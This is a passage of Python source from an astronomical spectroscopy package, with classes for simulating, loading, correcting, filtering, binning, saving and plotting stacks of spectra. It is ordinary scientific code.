hi, etai, prfi in zip(true_line, amp, fwhm, voff, h, eta_mix, profile):\n wave, flux_i = cls.emission_line(ti, ampi, fwhmi, voffi, hi, etai, disp_inst, min_wave, max_wave,\n size, prfi)\n flux += flux_i\n else:\n raise ValueError(\"true_line must be one of: int, float, list, np.ndarray\")\n\n # Normalize and apply amplitude\n # flux = flux / np.nanmax(flux) * amp\n\n # Add random noise\n if noise_amp is None:\n noise_amp = baseline / 100\n\n # Truncate when below the noise level\n rng = np.random.default_rng(seed)\n noise = rng.normal(0, noise_amp, wave.size)\n flux[np.abs(flux) <= np.nanmedian(noise)] = 0\n flux[np.abs(flux) > np.nanmedian(noise)] -= np.nanmedian(noise)\n\n # Make the ends symmetric\n flux[(flux > -1e-6) & (flux < 1e-6)] = 0\n flux[0] = flux[1]\n flux[-1] = flux[-2]\n\n # Add simulated power law and noise\n if alpha is None:\n alpha = 0\n wave_b = 0.5*(np.nanmax(wave) + np.nanmin(wave))\n continuum = baseline * (wave / wave_b) ** alpha\n flux += continuum\n flux += noise\n\n # Assume ideal uniform error\n error = np.array([noise_amp] * len(flux))\n\n if name is None:\n unique_id = str(uuid.uuid1().hex)\n name = f'{unique_id:s}'\n\n snr = np.abs(amp / noise_amp)\n \n return cls(wave, flux, error, redshift=0, name=name, snr=snr, amp=amp, noise_amp=noise_amp)\n\n def to_numpy(self, _slice=None):\n # Convert to a lightweight numpy record array, with just wave, flux, and error information\n if _slice is None:\n return np.array([(w, f, e) for w, f, e in zip(self.wave, self.flux, self.error)],\n dtype=[('wave', float), ('flux', float), ('err', float)]).view(np.recarray)\n else:\n return np.array([(w, f, e) for w, f, e in zip(self.wave[_slice], self.flux[_slice], self.error[_slice])],\n dtype=[('wave', float), ('flux', float), ('err', float)]).view(np.recarray)\n\n def save_numpy(self, fname=None, compress=True, _slice=None):\n # Save to a numpy archive file for future use\n if not self.corrected:\n self.apply_corrections()\n record = self.to_numpy(_slice=_slice)\n save = np.save if not compress else np.savez\n if not fname:\n if compress:\n fname = self.name + '.npz'\n else:\n fname = self.name + '.npy'\n save(fname, record)\n\n @classmethod\n def from_numpy(cls, filepath, **kwargs):\n # Create a spectrum object from a previously saved npy or npz file\n array = np.load(filepath)\n if type(array) is np.lib.npyio.NpzFile:\n array = array.f.arr_0\n return cls(wave=array['wave'], flux=array['flux'], error=array['err'], **kwargs)\n\n # Arithmetic definitions (unused in the rest of the code, but here for convenience)\n # Error propagation is correctly attributed in each case (+, -, *, /) to the error spectrum of the new object\n\n def __add__(self, other):\n # Add the flux of two spectra together\n\n assert np.all(self.wave == other.wave), \"Cannot add two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot add two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot add two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux + other.flux), np.hypot(self.error, other.error), name='Added spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n def __sub__(self, other):\n # Subtract the flux from two spectra\n\n assert np.all(self.wave == other.wave), \"Cannot subtract two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot subtract two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot subtract two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux - other.flux), np.hypot(self.error, other.error), name='Subtracted spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n def __mul__(self, other):\n # Multiply the flux from two spectra\n\n assert np.all(self.wave == other.wave), \"Cannot multiply two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot multiply two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot multiply two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux * other.flux), np.hypot(other.flux*self.error, self.flux*other.error),\n name='Multiplied spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n def __truediv__(self, other):\n # Divide the flux from two spectra\n\n assert np.all(self.wave == other.wave), \"Cannot divide two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot divide two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot divide two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux / other.flux),\n (self.flux / other.flux)*np.hypot(self.error/self.flux, other.error/other.flux),\n name='Divided spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n\nclass Spectra(dict):\n \"\"\"\n An extension of the base Python dictionary for storing Spectrum objects.\n \"\"\"\n\n default_keys = Spectrum.__slots__\n\n def to_numpy(self, keys=None):\n \"\"\"\n Unpacks values to a dict of numpy arrays.\n\n :param keys: str, iterable\n A list of strings containing the keys to unpack, defaults to None for all keys.\n\n :return out: dict\n A dictionary containing the numpy arrays.\n \"\"\"\n if keys is None:\n keys = self.default_keys\n else:\n t = type(keys)\n if t is str:\n keys = [keys]\n out = {}\n for key in keys:\n t = type(getattr(self[0], key))\n out[key] = np.array([getattr(self[sname], key) for sname in self], dtype=t)\n return out\n\n def add_spec(self, spec):\n \"\"\"\n Add a spectrum to the spectra dictionary with spec.name as a key.\n\n :param spec: Spectrum object\n The object to add to the dictionary.\n :return: None\n \"\"\"\n self[spec.name] = spec\n\n def correct_spectra(self, r_v=3.1):\n \"\"\"\n Apply velocity and extinction corrections to all spectra in the dictionary.\n\n :param r_v: float, iterable\n The extinction ratio (or ratios) A(V)/E(B-V) to use in the corrections for each spectrum.\n If float, the same correction is applied to all spectra. Default is 3.1\n :return None:\n \"\"\"\n if type(r_v) not in (list, tuple, np.ndarray):\n for item in self:\n self[item].apply_corrections(r_v=r_v)\n else:\n for item, r_vi in zip(self, r_v):\n self[item].apply_corrections(r_v=r_vi)\n\n def plot_spectra(self, fname_root, spectra='all', _range=None, ylim=None, title_text=None, backend='plotly',\n plot_model=None, f=None, normalized=False, shade_reg=None):\n \"\"\"\n Plot a series of spectra from the dictionary.\n\n :param fname_root: str\n The parent directory to save all plot figures to.\n :param spectra: str, iterable\n Dictionary keys of which spectra to plot. If 'all', all are plotted. Defaults to all.\n :param _range: optional, tuple\n x-limits on plotted data\n :param ylim: optional, tuple\n y-limits on plotted data\n :param title_text: optional, dict\n Title text to be applied to each plotted spectra. Should be a dictionary with each entry having a key\n of the spectrum name.\n :param backend: str\n 'plotly' or 'pyplot'\n :param plot_model: optional, tuple\n A tuple of two strings corresponding to keys for the data dict to plot x and y data overtop of the spectrum.\n :param f: optional, list\n A list containing values corresponding to each plot to be appended to the beginning of the file names.\n :param normalized: bool\n Whether or not to normalize the flux before plotting.\n :param shade_reg: list\n A list of tuples containing left and right boundaries over which to shade in the plot.\n :return None:\n \"\"\"\n print('Plotting spectra...')\n fmt = '.html' if backend == 'plotly' else '.pdf'\n if not os.path.exists(fname_root):\n os.makedirs(fname_root)\n if type(spectra) is str:\n if spectra == 'all':\n for i, item in enumerate(tqdm.tqdm(self)):\n ttl = None if title_text is None else title_text[item]\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n if f is not None:\n fname = os.path.join(fname_root,\n f'{f[i]:.3f}_' + self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n else:\n for i, item in enumerate(tqdm.tqdm(self)):\n if item in spectra or i in spectra:\n if item not in self or item not in title_text:\n print(f'WARNING: {item} not found in stack!')\n continue\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n ttl = None if title_text is None else title_text[item]\n if f is not None:\n fname = os.path.join(fname_root,\n f'{f[i]:.3f}_' + self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n\n def get_spec_index(self, name):\n \"\"\"\n Get the relative position in the dictionary (as an int) of a spectra given its name.\n\n :param name: str\n The key of the item in the dictionary.\n :return: int\n The index of the key in the dictionary.\n \"\"\"\n return list(self.keys()).index(name)\n\n def get_spec_name(self, index):\n \"\"\"\n Get the name of a spectra given its position in the dictionary (as an int).\n\n :param index: int\n The position of the item in the dictionary.\n :return: str\n The key of the dictionary entry.\n \"\"\"\n return list(self.keys())[index]\n\n def __setitem__(self, key, spec):\n if spec.name == 'Generic':\n spec.name = key\n super().__setitem__(key, spec)\n\n def __getitem__(self, key):\n t = type(key)\n if t is str or t is np.str_:\n return super().__getitem__(key)\n elif t is int or t is np.int_:\n return self[list(self.keys())[key]]\n # elif t in (list, tuple, np.ndarray):\n # if type(key[0]) in (str, np.str, np.str_):\n # return [super().__getitem__(ki) for ki in key]\n # elif type(key[0]) is int:\n # return [self[list(self.keys())[ki]] for ki in key]\n\n def __delitem__(self, key):\n t = type(key)\n if t is str or t is np.str or t is np.str_:\n return super().__delitem__(key)\n elif t is int:\n del self[list(self.keys())[key]]\n\n @property\n def corrected(self):\n for item in self:\n if not self[item].corrected:\n return False\n return True\n\n def __repr__(self):\n return f\"A collection of {len(self)} spectra.\"\n\n def save_pickle(self, filepath):\n \"\"\"\n Save the object contents to a pickle file.\n\n :param filepath: str\n The path to save the pickle file to.\n :return None:\n \"\"\"\n with open(filepath, 'wb') as handle:\n pickle.dump(self, handle)\n\n def save_json(self, filepath):\n \"\"\"\n Save the object contents to a json file.\n\n :param filepath: str\n The path to save the json file to.\n :return None:\n \"\"\"\n with open(filepath, 'w') as handle:\n serializable = copy.deepcopy(self)\n for key in serializable.keys():\n serializable[key].wave = serializable[key].wave.tolist()\n serializable[key].flux = serializable[key].flux.tolist()\n serializable[key].error = serializable[key].error.tolist()\n serializable = serializable.__dict__\n serialized = json.dumps(serializable, indent=4)\n handle.write(serialized)\n\n def save_toml(self, filepath):\n \"\"\"\n Save the object contents to a toml file.\n\n :param filepath: str\n The path to save the toml file to.\n :return: None\n \"\"\"\n serializable = copy.deepcopy(self).__dict__\n with open(filepath, 'w') as handle:\n toml.dump(serializable, handle, encoder=toml.TomlNumpyEncoder())\n\n\nclass Stack(Spectra):\n\n def __init__(self, universal_grid=None, stacked_flux=None, stacked_err=None, filters=None, r_v=3.1,\n gridspace=1, tolerance=500, norm_region=None, wave_criterion='lenient', progress_bar=True):\n \"\"\"\n An extension of the Spectra class (and by extension, the dictionary) specifically for stacking purposes.\n\n :param universal_grid: optional, array\n A uniform wavelength grid used for all spectra. If binned, a list of arrays for each bin.\n :param stacked_flux: optional, array\n An array of the stacked flux. If binned, a list of arrays for each bin.\n :param stacked_err: optional, array\n An array of the stacked flux error. If binned, a list of arrays for each bin.\n :param filters: optional, array\n An array of filters to remove individual spectra that do not satisfy certain conditions.\n Each entry must either be a bifrost Filter object or a string that can be converted into a Filter object.\n :param r_v: float\n Extinction ratio A(V)/E(B-V) to calculate for. Default = 3.1\n :param gridspace: float\n Spacing of the wavelength grid. Default = 1\n :param tolerance: float\n Tolerance for throwing out spectra that are > tolerance angstroms apart from others. Default = 500\n :param norm_region: optional, tuple\n Wavelength bounds to use for the normalization region, with no prominent lines. Default = None\n :param wave_criterion: str\n One of the following:\n 'strict': Completely delete all spectra that do not satisfy wavelength coverage requirements stipulated\n by tolerance and the normalization region.\n 'lenient': Do not delete any spectra. Stack over the entire region, using the full range of spectra\n that have wavelength coverage in different parts of the spectrum. Will result in a stack with a\n different number of constituent spectra at different wavelength positions.\n :param progress_bar: bool\n If True, shows progress bars for stacking procedures. Default is False.\n \"\"\"\n # Fill in instance attributes\n self.r_v = r_v\n self.gridspace = gridspace\n self.tolerance = tolerance\n self.norm_region = norm_region\n if wave_criterion not in ('strict', 'lenient'):\n raise ValueError('wave_criterion must be one of: strict, lenient')\n self.wave_criterion = wave_criterion\n # Filters\n if filters is None:\n filters = []\n else:\n for i in range(len(filters)):\n if type(filters[i]) is str:\n filters[i] = bfilters.Filter.from_str(filters[i])\n self.filters = filters\n self.progress_bar = progress_bar\n # Default object properties that will be filled in later\n if not universal_grid:\n universal_grid = []\n if not stacked_flux:\n stacked_flux = []\n if not stacked_err:\n stacked_err = []\n self.universal_grid = universal_grid\n self.stacked_flux = stacked_flux\n self.stacked_err = stacked_err\n self.specnames_f = []\n self.specnames_e = []\n self.nspec_f = []\n self.nspec_e = []\n self.binned = None\n self.binned_spec = None\n self.bin_counts = None\n self.bin_edges = None\n self.bin_log = False\n self.agn_ref_pt = None\n super().__init__()\n\n @classmethod\n @utils.timer(name='Quick FITS Load')\n def quick_fits_stack(cls, data_path, out_path=None, n_jobs=-1, save_pickle=True, save_json=False, save_toml=False,\n limits=None, _filters=None, name_by='id', properties_tbl=None,\n properties_comment='#', properties_sep=',', properties_name_col=0, progress_bar=True,\n stack_name='stacked_data', **kwargs):\n \"\"\"\n A convenience function for quickly creating a stack object from FITS files.\n\n :param data_path: str\n The path to the parent folder containing fits files, or subfolders with fits files.\n :param out_path: str\n The output path to save output plots and pickles/jsons to. Default is \"data.stacked.YYYYMMDD_HHMMSS\"\n :param n_jobs: int\n The number of jobs to run in parallel when reading in fits files. Default is -1, meaning\n as many jobs as are allowed to run in parallel.\n :param save_pickle: bool\n Whether or not to save the Stack object as a pickle file. Default is true.\n :param save_json: bool\n Whether or not to save the Stack object as a json file. Default is false.\n :param limits: tuple\n Limit to only use data in the range of these indices.\n :param _filters: str, iterable\n Filter objects to be applied to the Stack.\n :param name_by: str\n \"folder\" or \"file\" : how to specify object keys, based on the name of the fits file or the folder that the fits\n file is in.\n :param properties_tbl: str, iterable\n A path (or paths) to a table file (.csv, .tbl, .xlsx, .txt, ...) containing properties of the spectra that are\n being loaded in separately. The file MUST be in the correct format:\n - The header must be the first uncommented row in the file\n - Comments should be marked with properties_comment (Default: \"#\")\n - Should be delimited by properties_sep (Default: \",\")\n - The properties_name_col (Default: 0)th column should be the object name, which should match the object\n name(s) read in from fits files/folders.\n - All other columns should list properties that the user wants to be appended to Spectrum objects.\n :param properties_sep: str\n Delimiter for the properties_tbl file. Default: \",\"\n :param properties_comment: str\n Comment character for the properties_tbl file. Default: \"#\"\n :param properties_name_col: int\n Index of the column that speicifies object name in the properties_tbl file. Default: 0.\n :param progress_bar: bool\n If True, shows a progress bar for reading in files. Default is False.\n :param stack_name: str\n The name of the stack, for file saving purposes.\n :return stack: Stack\n The Stack object.\n \"\"\"\n # Create output paths\n if not out_path:\n out_path = 'data.stacked.' + utils.gen_datestr(True)\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n if out_path[-1] != os.sep:\n out_path += os.sep\n\n # Gather spectra paths\n all_spectra = utils.get_filepaths_from_parent(data_path, ['fits', 'fit', 'fit.fz', 'fits.fz', '.fts', 'FITS', 'FIT', 'FIT.FZ', 'FITS.FZ', '.FTS'])\n if limits:\n all_spectra = all_spectra[limits[0]:limits[1]]\n\n # Configure filter objects\n filter_list = []\n if not _filters:\n _filters = []\n if type(_filters) is str:\n _filters = [_filters]\n for _filter in _filters:\n filter_list.append(bfilters.Filter.from_str(_filter))\n stack = cls(filters=filter_list, progress_bar=progress_bar, **kwargs)\n\n assert name_by in ('file', 'folder', 'id'), \"name_by must be one of ['file', 'folder', 'id']\"\n\n def make_spec(filepath):\n name = None\n if name_by == 'id':\n name = None\n elif name_by == 'file':\n name = filepath.split(os.sep)[-1]\n elif name_by == 'folder':\n name = filepath.split(os.sep)[-2]\n # elif name_by == 'iau':\n # name = None\n ispec = Spectrum.from_fits(filepath, name=name)\n return ispec\n\n print('Loading in spectra...')\n range_ = tqdm.tqdm(all_spectra) if progress_bar else all_spectra\n specs = Parallel(n_jobs=n_jobs)(delayed(make_spec)(fpath) for fpath in range_)\n for ispec in specs:\n stack.add_spec(ispec)\n print('Done.')\n\n if properties_tbl:\n print('Loading in table data...')\n if type(properties_tbl) is str:\n properties_tbl = [properties_tbl]\n if type(properties_sep) is str:\n properties_sep = [properties_sep] * len(properties_tbl)\n if type(properties_comment) is str:\n properties_comment = [properties_comment] * len(properties_tbl)\n if type(properties_name_col) in (int, bool):\n properties_name_col = [properties_name_col] * len(properties_tbl)\n for tbl, sep, comm, name in zip(properties_tbl, properties_sep, properties_comment, properties_name_col):\n tbl_data = pd.read_csv(tbl, delimiter=sep, comment=comm,\n skipinitialspace=True, header=0, index_col=name)\n range_ = tqdm.tqdm(tbl_data.index) if progress_bar else tbl_data.index\n for namei in range_:\n # assert namei in stack.keys(), f\"ERROR: {namei} not found in Stack!\"\n if str(int(namei)) not in stack:\n print(f\"WARNING: {int(namei)} not found in stack!\")\n continue\n for tbl_col in tbl_data.columns:\n stack[str(int(namei))].data[tbl_col] = tbl_data[tbl_col][namei]\n print('Done.')\n\n if save_pickle:\n stack.save_pickle(out_path + stack_name + '.pkl')\n if save_json:\n stack.save_json(out_path + stack_name + '.json')\n if save_toml:\n stack.save_toml(out_path + stack_name + '.toml')\n\n return stack\n\n @classmethod\n @utils.timer(name='Quick Sim Load')\n def quick_sim_stack(cls, line, baselines, amplitudes, widths, voffs, alphas=None, h_moments=None, eta_mixes=None, \n noise_amplitudes=None, seeds=None, disp_insts=None, min_wave=3000, max_wave=8000, size=10_000, \n profiles=None, names=None, out_path=None, n_jobs=-1, save_pickle=True, save_json=False, save_toml=False,\n _filters=None, progress_bar=False):\n \"\"\"\n The main driver for the stacking code.\n\n :param line: float\n Wavelength of the line to generate simulated spectra for.\n :param baselines: iterable\n A list of baseline fluxes for each simulated spectra. Must match the length of amplitudes, widths, voffs, ...\n :param amplitudes: iterable\n A list of amplitudes for each simulated spectra. Must match the length of baselines, widths, voffs, ...\n :param widths: iterable\n A list of widths for each simulated spectra. Must match the length of baselines, amplitudes, voffs, ....\n :param voffs: iterable\n A list of velocity offsets for each simulated spectra. Must match the length of baselines, amplitudes, widths, ...\n :param alphas: iterable\n A list of power law slopes for each simulated spectra. Must match the length of baselines, amplitudes, widths, ...\n :param h_moments: iterable\n A list of hermite moments for each simulated spectra of shape (n x m) for n spectra and m moments\n :param eta_mixes: iterable\n A list of eta mixing parameters for each simulated Voigt profile.\n :param noise_amplitudes: iterable\n A list of noise amplitudes for each simulated spectra. Must match the length of amplitudes, widths, voffs, ...\n :param seeds: iterable\n A list of random number generator seeds for each simulated spectra. Must match the length of amplitudes, widths, voffs, ...\n :param min_wave: float\n Minimum wavelength in the grid.\n :param max_wave: float\n Maximum wavelength in the grid.\n :param size: integer\n The number of datapoints in the wavelength/pixel grid.\n :param profiles: iterable or str\n The profiles of each simulated spectra. \"random\" randomizes the profile of each spectrum.\n :param names: iterable\n The names of each simulated spectra.\n :param out_path: str\n The output path to save output plots and pickles/jsons to. Default is \"data.stacked.YYYYMMDD_HHMMSS\"\n :param n_jobs: int\n The number of jobs to run in parallel when reading in fits files. Default is -1, meaning\n as many jobs as are allowed to run in parallel.\n :param save_pickle: bool\n Whether or not to save the Stack object as a pickle file. Default is true.\n :param save_json: bool\n Whether or not to save the Stack object as a json file. Default is false.\n :param save_toml: bool\n Whether or not to save the Stack object as a toml file. Default is false.\n :param _filters: str, iterable\n Filter objects to be applied to the Stack.\n :param progress_bar: bool\n If True, shows a progress bar for reading in files. Default is False.\n :return stack: Stack\n The Stack object.\n\n If line is a 1D array and amplitudes, widths, and voffs are 2D arrays, this is interpreted as the 2nd dimension being all lines that \n are superimposed on the same simulated spectrum; in this case, eta_mixes must be 2D and h_moments must be 3D (n spectra x m lines x p moments)\n \"\"\"\n # Create output paths\n if not out_path:\n out_path = 'data.stacked.' + utils.gen_datestr(True)\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n out_path += os.sep\n\n # Configure filter objects\n filter_list = []\n if not _filters:\n _filters = []\n if type(_filters) is str:\n _filters = [_filters]\n for _filter in _filters:\n filter_list.append(bfilters.Filter.from_str(_filter))\n stack = cls(filters=filter_list, progress_bar=progress_bar)\n\n SHAPE = (size,) if type(line) in (int, float, np.int_, np.float_) else (size, len(line))\n if alphas is None:\n alphas = [None] * len(baselines)\n if h_moments is None:\n h_moments = np.full((size,2) if type(line) in (int, float, np.int_, np.float_) else (size,len(line),2), fill_value=np.nan)\n if eta_mixes is None:\n eta_mixes = np.full(SHAPE, fill_value=np.nan)\n if disp_insts is None:\n disp_insts = [None] * len(baselines)\n if noise_amplitudes is None:\n noise_amplitudes = [None] * len(baselines)\n if names is None:\n names = [None] * len(baselines)\n if seeds is None:\n seeds = [None] * len(baselines)\n\n def make_spec(baseline, amp, fwhm, voff, alpha, h, eta_mix, noise_amp, seed, disp_inst, name):\n return Spectrum.simulated(line, baseline, amp, fwhm, voff, alpha, h, eta_mix, noise_amp, seed, disp_inst,\n min_wave, max_wave, size, profiles, name)\n\n print('Generating spectra...')\n range_ = tqdm.trange(len(baselines)) if progress_bar else range(len(baselines))\n specs = Parallel(n_jobs=n_jobs)(delayed(make_spec)(baselines[i], amplitudes[i, ...], widths[i, ...], voffs[i, ...], \n alphas[i], h_moments[i, ...], eta_mixes[i, ...], noise_amplitudes[i], seeds[i], \n disp_insts[i], names[i]) for i in range_)\n for ispec in specs:\n stack.add_spec(ispec)\n\n if save_pickle:\n stack.save_pickle(out_path + 'stacked_data.pkl')\n if save_json:\n stack.save_json(out_path + 'stacked_data.json')\n if save_toml:\n stack.save_toml(out_path + 'stacked_data.toml')\n\n return stack\n\n def calc_norm_region(self, wave_grid):\n \"\"\"\n Calculate the optimal region to perform normalization. Finds the largest span of wavelengths between\n absportion lines that is also covered by all the spectra in the dictionary. Fails if no such region can\n be found. The region is set to the instance attribute self.norm_region.\n\n :param wave_grid: iterable\n A uniform wave grid used for all spectra.\n :return nr0, nr1: tuple\n The left and right edges of the normalization region.\n \"\"\"\n if self.wave_criterion == 'strict':\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3346.790, 3426.850, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6374.510, 6549.860, 6564.610, 6585.270, 6718.290, 6732.670, 7891.800])\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n lines = np.concatenate((emlines, abslines))\n lines.sort()\n diffs = np.diff(lines)\n for _ in range(len(diffs)):\n imax = np.nanargmax(diffs)\n nr0, nr1 = lines[imax], lines[imax + 1]\n if wave_grid[0] < nr0 < wave_grid[-1] and wave_grid[0] < nr1 < wave_grid[-1]:\n self.norm_region = (nr0, nr1)\n return nr0, nr1\n else:\n diffs[imax] = np.nan\n print(\"WARNING: An ideal normalization region could not be found! Using the entire range.\")\n self.norm_region = (wave_grid[0], wave_grid[-1])\n return wave_grid[0], wave_grid[-1]\n elif self.wave_criterion == 'lenient':\n print(\"WARNING: wave_criterion is lenient, so a constrained normalization region cannot be calculated.\"\n \" Using the ENTIRE wavelength range as the normalization region.\")\n return wave_grid[0], wave_grid[-1]\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n\n def filter_spectra(self):\n \"\"\"\n Go through each filter and decide if each spectrum fits its criteria. If not, the specttrum is masked out.\n\n :return None:\n \"\"\"\n aliases = {'z': 'redshift'}\n for filt in self.filters:\n if filt.attribute in aliases:\n att = aliases[filt.attribute]\n else:\n att = filt.attribute\n removals = []\n for ispec in self:\n if not (filt.lower_bound < getattr(self[ispec], att) < filt.upper_bound):\n print(f\"WARNING: Removing spectrum {self.get_spec_index(ispec) + 1}: {ispec} \"\n f\"since it does not fulfill the criteria: {filt}\")\n removals.append(ispec)\n for r in removals:\n del self[r]\n\n def bin_spectra(self, bin_quantity, bin_size=None, nbins=None, log=False, midpoints=False, round_bins=None):\n \"\"\"\n Place spectra into bins for the bin_quantity.\n\n :param bin_quantity: str\n The quantity that the data should be binned by. Spectra must have appropriate values within their\n self.data dictionaries.\n :param bin_size: float\n How large each bin should be. If specified, then do not also specify nbins.\n :param nbins: int\n The number of bins to use. If specified, then do not also specify bin_size.\n :param log: bool\n Whether or not to take the log_10 of the bin_quantity before binning.\n :param midpoints: bool\n Whether or not to return the midpoints of each bin instead of the edges. Default is false.\n :param round_bins: float\n Whether or not to make bins regular, i.e. round to nice numbers like the nearest 0.1 or 0.5.\n Round the bin edges to the nearest multiple of this float.\n :return binned_spec: dict\n Dictionary containing the names of the spectra within each bin. The keys are the bin indices.\n :return bin_counts: np.ndarray(shape=(nbins,))\n The number of spectra in each bin.\n :return bin_edges: np.ndarray(shape=(nbins+1,))\n The edge values of each bin.\n \"\"\"\n self.bin_log = log\n # Make sure arguments make sense\n if not bin_size and not nbins:\n raise ValueError(\"One of {bin_size,nbins} must be specified!\")\n if bin_size and nbins:\n raise ValueError(\"Both of {bin_size,nbins} may not be specified!\")\n\n # Load in the data from each spectrum and make an array of the appropriate quantity and names\n data = self.to_numpy('data')['data']\n unbinned = np.array([], dtype=np.float64)\n included = np.array([], dtype=np.str)\n for ispec in self:\n # Gather the data to bin\n i = self.get_spec_index(ispec)\n if bin_quantity not in data[i].keys():\n print(f\"WARNING: bin_quantity not found in {ispec} data! Ignoring this spectrum\")\n continue\n _id = data[i][bin_quantity]\n if log:\n _id = np.log10(_id)\n if np.isnan(_id):\n print(f\"WARNING: bin_quantity is {_id} in {ispec} data! Ignoring this spectrum\")\n continue\n included = np.append(included, ispec)\n unbinned = np.append(unbinned, _id)\n\n # Perform the binning\n minbin = np.nanmin(unbinned)\n maxbin = np.nanmax(unbinned)\n if bin_size:\n nbins = -int(-(maxbin - minbin) // bin_size)\n elif nbins:\n bin_size = (maxbin - minbin) / nbins\n if round_bins:\n rating = 1 / round_bins\n minbin = np.floor(minbin * rating) / rating\n maxbin = np.ceil(maxbin * rating) / rating\n bin_size = np.round(bin_size * rating) / rating\n if bin_size == 0:\n bin_size = round_bins\n nbins = -int(-(maxbin - minbin) // bin_size)\n\n binned_spec = {i: np.array([], dtype=np.str) for i in range(nbins)}\n bin_counts = np.zeros(nbins)\n\n bin_edges = minbin + np.arange(0, nbins + 1, 1) * bin_size\n bin_midpts = minbin + (np.arange(0, nbins, 1) + 0.5) * bin_size\n for i in range(len(included)):\n indx = int((unbinned[i] - minbin) / bin_size)\n if indx == len(binned_spec):\n indx -= 1\n binned_spec[indx] = np.append(binned_spec[indx], included[i])\n bin_counts[indx] += 1\n\n if midpoints:\n return binned_spec, bin_counts, bin_midpts\n return binned_spec, bin_counts, bin_edges\n\n def histogram_3d(self, fname_base, bin_quantities, logs, nbins=None, bin_size=None, round_bins=None, labels=None,\n backend='plotly', colormap=None):\n \"\"\"\n Make a 3D histogram of the data using 3 quanitites.\n\n :param fname_base: str\n File name without the extension.\n :param bin_quantities: iterable\n List of the names of quantities to bin by.\n :param logs: iterable\n List of booleans on whether to take the log10 of each bin quantity.\n :param nbins: iterable\n List of the number of bins to use for each quantity.\n :param bin_size: iterable\n List of the size of each bin to use for each quantity.\n :param round_bins: iterable\n List of booleans whether to round bins nicely for each quantity.\n :param labels: iterable\n List of labels for each bin.\n :param backend: str\n 'plotly' or 'pyplot'\n :param colormap: str or matplotlib colormap object\n The colormap to use for the 3rd bin quantity.\n :return:\n \"\"\"\n\n binx, biny, binz = bin_quantities\n logx, logy, logz = logs\n if nbins:\n nbx, nby, nbz = nbins\n else:\n nbx, nby, nbz = None, None, None\n if bin_size:\n bsx, bsy, bsz = bin_size\n else:\n bsx, bsy, bsz = None, None, None\n if round_bins:\n rbx, rby, rbz = round_bins\n else:\n rbx, rby, rbz = None, None, None\n specx, countsx, edgex = self.bin_spectra(binx, log=logx, nbins=nbx, bin_size=bsx, round_bins=rbx)\n specy, countsy, edgey = self.bin_spectra(biny, log=logy, nbins=nby, bin_size=bsy, round_bins=rby)\n # specz, countsz, edgez = self.bin_spectra(binz, log=logz, nbins=nbz, bin_size=bsz, round_bins=rbz)\n\n nbx = len(countsx)\n nby = len(countsy)\n # nbz = len(countsz)\n z_array = np.zeros(shape=(nby, nbx), dtype=np.float64)\n n_array = np.zeros(shape=(nby, nbx), dtype=np.int64)\n for x, y in itertools.product(np.arange(nbx), np.arange(nby)):\n # specx[x], specy[y]\n good_spec = np.array([], dtype=np.str)\n z_spec = np.array([], dtype=np.float64)\n for spec in specx[x]:\n if spec in specy[y]:\n good_spec = np.append(good_spec, spec)\n zi = self[spec].data[binz]\n if logz:\n zi = np.log10(zi)\n z_spec = np.append(z_spec, zi)\n z_array[y, x] = np.median(z_spec)\n n_array[y, x] = good_spec.size\n\n if backend == 'pyplot':\n if not colormap:\n colormap = 'winter'\n fig, ax = plt.subplots(figsize=(nbx / nby * 7.5 + 3.5, 7.5))\n mesh = ax.pcolormesh(edgex, edgey, z_array, shading='flat', cmap=colormap)\n\n if not labels:\n xlabel = binx if not logx else '$\\\\log($' + binx + '$)$'\n ylabel = biny if not logy else '$\\\\log($' + biny + '$)$'\n zlabel = binz if not logz else '$\\\\log($' + binz + '$)$'\n else:\n xlabel, ylabel, zlabel = labels\n fig.colorbar(mesh, ax=ax, label=zlabel)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n\n for x, y in 